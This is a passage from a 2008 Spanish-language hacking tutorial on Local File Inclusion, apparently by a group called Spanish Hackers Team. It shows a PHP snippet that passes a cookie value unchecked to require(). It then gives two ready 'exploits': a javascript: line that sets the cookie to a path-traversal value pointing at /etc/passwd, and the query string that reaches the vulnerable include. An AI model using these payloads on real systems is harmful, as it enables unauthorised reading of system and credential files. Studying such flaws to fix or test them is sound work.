Documentos de Académico
Documentos de Profesional
Documentos de Cultura
____ __ __ __
/\ _`\ /\ \ __ /\ \__/\ \
\ \ \L\_\__ __ ___\ \ \/'\ /\_\ ___ __ \ \ ,_\ \ \___ __
\ \ _\/\ \/\ \ /'___\ \ , < \/\ \ /' _ `\ /'_ `\ \ \ \/\ \ _ `\ /'__`\
\ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \ \ \ \_\ \ \ \ \/\ __/
\ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \ \ \__\\ \_\ \_\ \____\
\/_/ \/___/ \/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \ \/__/ \/_/\/_/\/____/
/\____/
\_/__/
__ __ __ ______
/\ \ __/\ \ /\ \ /\ _ \
\ \ \/\ \ \ \ __\ \ \____ \ \ \L\ \ _____ _____ ____
\ \ \ \ \ \ \ /'__`\ \ '__`\ \ \ __ \/\ '__`\/\ '__`\ /',__\
\ \ \_/ \_\ \/\ __/\ \ \L\ \ \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\
\ `\___x___/\ \____\\ \_,__/ \ \_\ \_\ \ ,__/\ \ ,__/\/\____/
'\/__//__/ \/____/ \/___/ \/_/\/_/\ \ \/ \ \ \/ \/___/
\ \_\ \ \_\
\/_/ \/_/
Local File Inclusion #1
attack edition
-[ INFOS ]----------------------------------------------------------------------
-
Title: "fucking the Web Apps [LFI #1]"
Version: attack edition
Author: JosS
mail: sys-project[at]hotmail[dot]com
site: http://spanish-hackers.com
team: Spanish Hackers Team - [SHT]
date: 2008-10-07
-[ SUMMARY ]--------------------------------------------------------------------
-
0x00: Introducción
0x01: Local File Inclusion
0x02: Exploits
0x03: Créditos
----
Para el cuarto y último ejemplo para terminar el apartado de 'LFI' tenemos una
situación parecida a la del ejemplo 1, es decir un LFI, que tenemos que jugar
con los 'IF GETS' más la vulnerabilidad que permite el manejo de la 'COOKIE'.
[code #4]
x: >...
if (isset($_GET["mode"]))
{
if ($_GET["mode"]=="edit")
{
if (isset($_GET['id']))
{
$notefile = $_COOKIE['note'];
if ($notefile == "new")
{
$title = "";
$notes = "";
}
else
{
$temp = "notes/" . $notefile;
require($temp);
}
x: <...
x: }}}
[ENDcode #4]
No voy a explicar nuevamente paso a paso lo que hace este código, ya que lo vimos
en el ejemplo 1 de este apartado.
Tenemos que tener en cuenta que para que nuestro de valor de '$_COOKIE' se inclu
ya
debemos dar positivo a los 'IF' que nos ayudan a llegar al include de nuestra
'COOKIE'. Entonces nos quedamos con estos dos exploits.
Exploit 1:
javascript:document.cookie="note=../../../../../../../../../../etc/passwd; path=
/";
Exploit 2: ?mode=edit&id